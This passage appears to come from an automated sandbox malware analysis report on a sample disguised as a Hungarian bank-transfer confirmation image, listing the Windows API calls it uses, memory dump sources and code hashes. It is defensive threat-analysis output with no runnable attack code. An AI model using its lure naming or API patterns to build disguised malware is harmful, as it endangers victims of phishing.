                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                          • API String ID: 2574300362-3530519716
                                                                                                          • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                          • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                          • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                                                          • API String ID: 2574300362-275556492
                                                                                                          • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                                          • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                                          • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                                                          • API String ID: 2574300362-58917771
                                                                                                          • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                                          • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                                          • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                                          APIs
                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressLibraryLoadProc
                                                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                          • API String ID: 2574300362-4033151799
                                                                                                          • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                                          • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                                          • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                                          APIs
                                                                                                          • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                                                          • String ID:
                                                                                                          • API String ID: 2808897238-0
                                                                                                          • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                                          • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                                          • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                                          • __itow.LIBCMT ref: 004699CD
                                                                                                            • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                                          • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                                          • __itow.LIBCMT ref: 00469A97
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$__itow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3379773720-0
                                                                                                          • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                                          • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                                          • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$ClientMoveRectScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3880355969-0
                                                                                                          • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                          • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                                          • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                                          • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                                          APIs
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                                          • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                                          • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1352109105-0
                                                                                                          • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                          • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                                          • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                                          • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                                          APIs
                                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 3321077145-0
                                                                                                          • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                          • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                                          • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                                          • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                                          APIs
                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                                          • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                                          • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                          • String ID:
                                                                                                          • API String ID: 3058430110-0
                                                                                                          • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                          • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                                          • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                                          • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                                          APIs
                                                                                                          • GetParent.USER32(?), ref: 004503C8
                                                                                                          • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                                          • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                                          • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Proc$Parent
                                                                                                          • String ID:
                                                                                                          • API String ID: 2351499541-0
                                                                                                          • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                          • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                                          • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                                          • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                                          APIs
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                                          • TranslateMessage.USER32(?), ref: 00442B01
                                                                                                          • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchTranslate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1795658109-0
                                                                                                          • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                          • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                                          • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                                          • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                                          APIs
                                                                                                          • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                            • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                            • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                            • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                          • GetCaretPos.USER32(?), ref: 004743B2
                                                                                                          • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                                          • GetForegroundWindow.USER32 ref: 004743EE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2759813231-0
                                                                                                          • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                                          • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                                          • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                          • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                                                          • _wcslen.LIBCMT ref: 00449519
                                                                                                          • _wcslen.LIBCMT ref: 00449526
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend_wcslen$_wcspbrk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2886238975-0
